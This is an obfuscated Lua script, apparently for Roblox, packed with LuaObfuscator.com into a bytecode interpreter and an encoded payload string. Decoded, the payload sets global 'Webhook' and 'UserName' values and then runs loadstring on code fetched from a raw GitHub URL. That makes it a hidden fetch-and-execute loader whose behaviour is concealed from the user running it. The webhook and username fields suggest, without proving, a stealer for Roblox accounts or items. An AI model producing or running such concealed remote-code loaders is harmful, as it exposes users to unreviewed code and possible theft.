--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==2) then function v22()local v31=0 -0 ;local v32;while true do if ((0 -0)==v31) then v32=v1(v16,v19,v19);v19=v19 + 1 ;v31=1;end if (v31==(1 -0)) then return v32;end end end v23=nil;function v23()local v33=0 -0 ;local v34;local v35;while true do if ((619 -(555 + 17 + 47))==v33) then v34,v35=v1(v16,v19,v19 + ((147 + 786) -(857 + 74)) );v19=v19 + 2 ;v33=1;end if ((569 -(367 + 201))==v33) then return (v35 * (1183 -(214 + 713))) + v34 ;end end end v18=3;end if (v18==4) then function v25()local v36=v24();local v37=v24();local v38=(3377 -2499) -(280 + 2 + 595) ;local v39=(v21(v37,1638 -(1523 + 114) ,18 + 2 ) * ((2 -0)^(1097 -(68 + 997)))) + v36 ;local v40=v21(v37,56 -35 ,1301 -(226 + 1044) );local v41=((v21(v37,(581 -(416 + 26)) -107 )==(118 -(32 + 85))) and  -((792 -(368 + 423)) + 0)) or (1 + 0) ;if (v40==(957 -(892 + 65))) then if (v39==0) then return v41 * (0 -0) ;else local v95=0 -0 ;while true do if (v95==0) then v40=1 -0 ;v38=0 -0 ;break;end end end elseif (v40==2047) then return ((v39==(0 -0)) and (v41 * (1/(350 -((273 -186) + 113 + 150))))) or (v41 * NaN) ;end return v8(v41,v40-((314 -136) + 845) ) * (v38 + (v39/((182 -((505 -(145 + 293)) + 113))^((110 -(10 + 8)) -(470 -(44 + 386)))))) ;end v26=nil;function v26(v42)local v43;if  not v42 then local v85=1486 -(998 + 488) ;while true do if (v85==(0 + 0)) then v42=v24();if (v42==(0 + 0)) then return "";end break;end end end v43=v3(v16,v19,(v19 + v42) -(3 -2) );v19=v19 + v42 ;local v44={};for v69=(1632 -(814 + 45)) -(201 + 571) , #v43 do v44[v69]=v2(v1(v3(v43,v69,v69)));end return v6(v44);end v18=5;end if (v18==6) then v29=nil;function v29()local v45=0;local v46;local v47;local v48;local v49;local v50;local v51;local v52;local v53;while true do if (v45~=3) then else local v92=0;while true do if (1==v92) then v45=6 -2 ;break;end if (v92==0) then v52=nil;v53=nil;v92=1538 -(485 + 1052) ;end end end if (v45==2) then v50=nil;v51=nil;v45=12 -9 ;end if (v45==(1323 -(1249 + 73))) then local v93=0;while true do if ((0 + 0)==v93) then v48=nil;v49=nil;v93=1146 -(466 + 679) ;end if (1~=v93) then else v45=2;break;end end end if (v45~=(9 -5)) then else while true do if (v46==2) then local v104=0 -0 ;while true do if (v104==(1901 -(106 + 1794))) then v46=1 + 2 ;break;end if (v104==(0 + 0)) then v51=nil;v52=nil;v104=2 -1 ;end end end if (v46==3) then v53=nil;while true do local v107=0;local v108;while true do if (v107==0) then v108=0;while true do if (v108~=(2 -1)) then else if (v47==(116 -(4 + 110))) then local v123=584 -(57 + 527) ;local v124;while true do if (v123~=(1427 -(41 + 1386))) then else v124=103 -(17 + 86) ;while true do if (v124~=0) then else local v178=0 + 0 ;while true do if (v178~=1) then else v124=1;break;end if ((0 -0)~=v178) then else for v188=2 -1 ,v52 do local v189=0;local v190;local v191;local v192;local v193;while true do if ((167 -(122 + 44))==v189) then v192=nil;v193=nil;v189=2;end if (v189==(2 -0)) then while true do if (v190==(0 -0)) then local v199=0;while true do if (v199~=0) then else v191=0 + 0 ;v192=nil;v199=1;end if (v199==(1 + 0)) then v190=1 -0 ;break;end end end if (v190==1) then v193=nil;while true do if (v191~=0) then else local v207=0;local v208;while true do if (v207==0) then v208=0;while true do if (1~=v208) then else v191=1;break;end if (v208==0) then v192=v22();v193=nil;v208=1;end end break;end end end if (v191~=1) then else if (v192==1) then v193=v22()~=0 ;elseif (v192==(67 -(30 + 35))) then v193=v25();elseif (v192~=(3 + 0)) then else v193=v26();end v53[v188]=v193;break;end end break;end end break;end if (v189==(1257 -(1043 + 214))) then v190=0;v191=nil;v189=3 -2 ;end end end v51[1215 -(323 + 889) ]=v22();v178=2 -1 ;end end end if ((581 -(361 + 219))==v124) then for v180=321 -(53 + 267) ,v24() do local v181=0;local v182;local v183;local v184;while true do if (v181==(0 + 0)) then v182=413 -(15 + 398) ;v183=nil;v181=983 -(18 + 964) ;end if (v181==1) then v184=nil;while true do if (v182~=(0 -0)) then else local v198=0;while true do if (1==v198) then v182=1;break;end if ((0 + 0)==v198) then local v200=0 + 0 ;while true do if (v200==(851 -(20 + 830))) then v198=1 + 0 ;break;end if (v200~=0) then else v183=0;v184=nil;v200=1;end end end end end if (v182~=(127 -(116 + 10))) then else while true do if (v183~=0) then else v184=v22();if (v21(v184,1 + 0 ,1)~=(738 -(542 + 196))) then else local v201=0 -0 ;local v202;local v203;local v204;local v205;while true do if (v201==(1 + 1)) then while true do if (v202~=2) then else local v211=0 + 0 ;local v212;while true do if ((0 + 0)~=v211) then else v212=0 -0 ;while true do if (v212==(2 -1)) then v202=1554 -(1126 + 425) ;break;end if (v212~=(405 -(118 + 287))) then else local v221=0 -0 ;while true do if (v221~=(1122 -(118 + 1003))) then else v212=1;break;end if (v221~=0) then else if (v21(v204,2 -1 ,1)==(378 -(142 + 235))) then v205[2]=v53[v205[2]];end if (v21(v204,2,2)==(4 -3)) then v205[1 + 2 ]=v53[v205[3]];end v221=1;end end end end break;end end end if (0==v202) then local v213=0;local v214;local v215;while true do if (v213==(977 -(553 + 424))) then v214=0;v215=nil;v213=1;end if (v213~=(1 -0)) then else while true do if (v214~=(0 + 0)) then else v215=0;while true do if (v215~=1) then else v202=1;break;end if (v215~=0) then else local v225=0 + 0 ;while true do if (v225~=(1 + 0)) then else v215=1;break;end if (v225==0) then v203=v21(v184,1 + 1 ,2 + 1 );v204=v21(v184,4,6);v225=2 -1 ;end end end end break;end end break;end end end if (v202==(2 -1)) then local v216=0;local v217;while true do if (v216==0) then v217=0;while true do if (v217~=(0 -0)) then else v205={v23(),v23(),nil,nil};if (v203==0) then local v222=0;local v223;local v224;while true do if (v222==1) then while true do if (v223==0) then v224=753 -(239 + 514) ;while true do if (0~=v224) then else v205[3]=v23();v205[2 + 2 ]=v23();break;end end break;end end break;end if (v222==0) then v223=1329 -(797 + 532) ;v224=nil;v222=1 + 0 ;end end elseif (v203==(1 + 0)) then v205[6 -3 ]=v24();elseif (v203==(1204 -(373 + 829))) then v205[734 -(476 + 255) ]=v24() -((1132 -(369 + 761))^16) ;elseif (v203==3) then local v232=0 + 0 ;local v233;local v234;while true do if (v232==(1 -0)) then while true do if (v233==(0 -0)) then v234=0;while true do if (v234~=0) then else v205[3]=v24() -(2^(254 -(64 + 174))) ;v205[1 + 3 ]=v23();break;end end break;end end break;end if (v232==(0 -0)) then v233=0;v234=nil;v232=1;end end end v217=1;end if (v217~=(337 -(144 + 192))) then else v202=2;break;end end break;end end end if (v202~=(219 -(42 + 174))) then else if (v21(v204,3,3 + 0 )==(1 + 0)) then v205[2 + 2 ]=v53[v205[4]];end v48[v180]=v205;break;end end break;end if (v201~=(1505 -(363 + 1141))) then else local v210=1580 -(1183 + 397) ;while true do if (v210~=(0 -0)) then else v204=nil;v205=nil;v210=1 + 0 ;end if (v210==(1 + 0)) then v201=1977 -(1913 + 62) ;break;end end end if (v201~=0) then else v202=0 + 0 ;v203=nil;v201=1;end end end break;end end break;end end break;end end end v47=3;break;end end break;end end end if (v47==(0 -0)) then local v125=1933 -(565 + 1368) ;while true do if (v125==1) then v50={};v47=3 -2 ;break;end if (v125~=(1661 -(1477 + 184))) then else local v162=0;while true do if (v162==1) then v125=1;break;end if (v162~=(0 -0)) then else local v179=0;while true do if (1==v179) then v162=1;break;end if (v179~=(0 + 0)) then else v48={};v49={};v179=857 -(564 + 292) ;end end end end end end end break;end if (v108==(0 -0)) then local v109=0;while true do if (v109==1) then v108=1;break;end if (0==v109) then if (v47==1) then local v163=0 -0 ;local v164;local v165;while true do if (v163==0) then v164=0;v165=nil;v163=305 -(244 + 60) ;end if (v163==(1 + 0)) then while true do if (v164==(476 -(41 + 435))) then v165=0;while true do if (v165==0) then local v196=0;local v197;while true do if (v196~=(1001 -(938 + 63))) then else v197=0 + 0 ;while true do if (v197==1) then v165=1;break;end if (v197==0) then local v206=1125 -(936 + 189) ;while true do if (v206==0) then v51={v48,v49,nil,v50};v52=v24();v206=1;end if (v206==1) then v197=1 + 0 ;break;end end end end break;end end end if (v165~=(1139 -(782 + 356))) then else v53={};v47=2;break;end end break;end end break;end end end if (v47==(270 -(176 + 91))) then local v166=0;local v167;while true do if (v166==0) then v167=0 -0 ;while true do if (v167==0) then for v194=1 -0 ,v24() do v49[v194-(1093 -(975 + 117)) ]=v29();end return v51;end end break;end end end v109=1;end end end end break;end end end break;end if (v46~=0) then else local v105=1875 -(157 + 1718) ;while true do if (v105~=(0 + 0)) then else v47=0;v48=nil;v105=3 -2 ;end if ((3 -2)~=v105) then else v46=1019 -(697 + 321) ;break;end end end if (v46~=1) then else local v106=0 -0 ;while true do if (v106==(1 -0)) then v46=2;break;end if (v106==(0 -0)) then v49=nil;v50=nil;v106=1;end end end end break;end if (v45==(0 + 0)) then local v94=0 -0 ;while true do if (v94==1) then v45=2 -1 ;break;end if (v94==0) then v46=0;v47=nil;v94=1228 -(322 + 905) ;end end end end end v30=nil;v18=7;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v54)if (v1(v54,2)==79) then local v86=0;while true do if (v86==0) then v20=v0(v3(v54,1,1));return "";end end else local v87=v2(v0(v54,16));if v20 then local v96=0;local v97;while true do if (v96==0) then v97=v5(v87,v20);v20=nil;v96=1;end if (v96==1) then return v97;end end else return v87;end end end);v18=1;end if (v18==3) then v24=nil;function v24()local v55=611 -(602 + 9) ;local v56;local v57;local v58;local v59;while true do if (1==v55) then return (v59 * (5393360 + 11383856)) + (v58 * (66725 -(449 + 740))) + (v57 * 256) + v56 ;end if (v55==((1801 -929) -(826 + 46))) then v56,v57,v58,v59=v1(v16,v19,v19 + (950 -(245 + 702)) );v19=v19 + 4 + (0 -0) ;v55=1;end end end v25=nil;v18=4;end if (v18==7) then function v30(v60,v61,v62)local v63=v60[1];local v64=v60[2];local v65=v60[3];return function(...)local v71=v63;local v72=v64;local v73=v65;local v74=v28;local v75=1;local v76= -1;local v77={};local v78={...};local v79=v12("#",...) -1 ;local v80={};local v81={};for v88=0,v79 do if (v88>=v73) then v77[v88-v73 ]=v78[v88 + 1 ];else v81[v88]=v78[v88 + 1 ];end end local v82=(v79-v73) + 1 ;local v83;local v84;while true do local v89=0;while true do if (v89==0) then v83=v71[v75];v84=v83[1];v89=1;end if (v89==1) then if (v84<=11) then if (v84<=5) then if (v84<=2) then if (v84<=0) then local v110=0;local v111;while true do if (v110==0) then v111=v83[2];v81[v111]=v81[v111](v13(v81,v111 + 1 ,v76));break;end end elseif (v84>1) then v81[v83[2]]=v62[v83[3]];elseif (v81[v83[2]]==v83[4]) then v75=v75 + 1 ;else v75=v83[3];end elseif (v84<=3) then v81[v83[2]]=v62[v83[3]];elseif (v84==4) then v75=v83[3];else v81[v83[2]][v83[3]]=v83[4];end elseif (v84<=8) then if (v84<=6) then v81[v83[2]][v83[3]]=v83[4];elseif (v84==7) then v81[v83[2]]();elseif (v81[v83[2]]==v83[4]) then v75=v75 + 1 ;else v75=v83[3];end elseif (v84<=9) then for v119=v83[2],v83[3] do v81[v119]=nil;end elseif (v84==10) then local v131=0;local v132;local v133;while true do if (v131==0) then v132=v83[2];v133=v81[v83[3]];v131=1;end if (v131==1) then v81[v132 + 1 ]=v133;v81[v132]=v133[v83[4]];break;end end else local v134=v83[2];local v135,v136=v74(v81[v134](v13(v81,v134 + 1 ,v83[3])));v76=(v136 + v134) -1 ;local v137=0;for v156=v134,v76 do local v157=0;while true do if (v157==0) then v137=v137 + 1 ;v81[v156]=v135[v137];break;end end end end elseif (v84<=17) then if (v84<=14) then if (v84<=12) then local v116=0;local v117;while true do if (v116==0) then v117=v83[2];v81[v117]=v81[v117](v13(v81,v117 + 1 ,v76));break;end end elseif (v84==13) then do return;end else v81[v83[2]]=v83[3]~=0 ;end elseif (v84<=15) then v81[v83[2]]();elseif (v84==16) then v81[v83[2]]=v83[3];else local v141=0;local v142;local v143;local v144;local v145;while true do if (v141==2) then for v176=v142,v76 do local v177=0;while true do if (v177==0) then v145=v145 + 1 ;v81[v176]=v143[v145];break;end end end break;end if (1==v141) then v76=(v144 + v142) -1 ;v145=0;v141=2;end if (v141==0) then v142=v83[2];v143,v144=v74(v81[v142](v13(v81,v142 + 1 ,v83[3])));v141=1;end end end elseif (v84<=20) then if (v84<=18) then for v121=v83[2],v83[3] do v81[v121]=nil;end elseif (v84==19) then local v146=v83[2];local v147=v81[v83[3]];v81[v146 + 1 ]=v147;v81[v146]=v147[v83[4]];else do return;end end elseif (v84<=21) then v81[v83[2]]=v83[3]~=0 ;elseif (v84>22) then v75=v83[3];else v81[v83[2]]=v83[3];end v75=v75 + 1 ;break;end end end end;end return v30(v29(),{},v17)(...);end if (v18==1) then v21=nil;function v21(v66,v67,v68)if v68 then local v90=(v66/((1207 -(902 + (829 -526)))^(v67-1)))%((3 -1)^(((v68-(2 -(1 -0))) -(v67-(1 + 0))) + 1)) ;return v90-(v90%(1691 -(1121 + 569))) ;else local v91=(216 -(22 + 192))^(v67-(766 -(468 + 297))) ;return (((v66%(v91 + v91))>=v91) and (684 -((1045 -(334 + 228)) + 200))) or (1463 -(1404 + 59)) ;end end v22=nil;v18=2;end end end v15("LOL!0B3O00028O00026O00F03F03023O005F4703073O00576562682O6F6B03013O0020030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970745A03083O00557365724E616D6503093O00557365724E616D6532001D3O0012103O00014O0012000100013O0026013O000200010001002O043O00020001001210000100013O0026010001001200010002002O043O00120001001202000200033O003005000200040005001202000200063O001202000300073O00200A000300030008001210000500094O000E000600014O000B000300064O000C00023O00022O000F000200010001002O043O001C00010026010001000500010001002O043O00050001001202000200033O0030050002000A0005001202000200033O0030050002000B0005001210000100023O002O043O00050001002O043O001C0001002O043O000200012O00143O00017O00",v9(),...);end
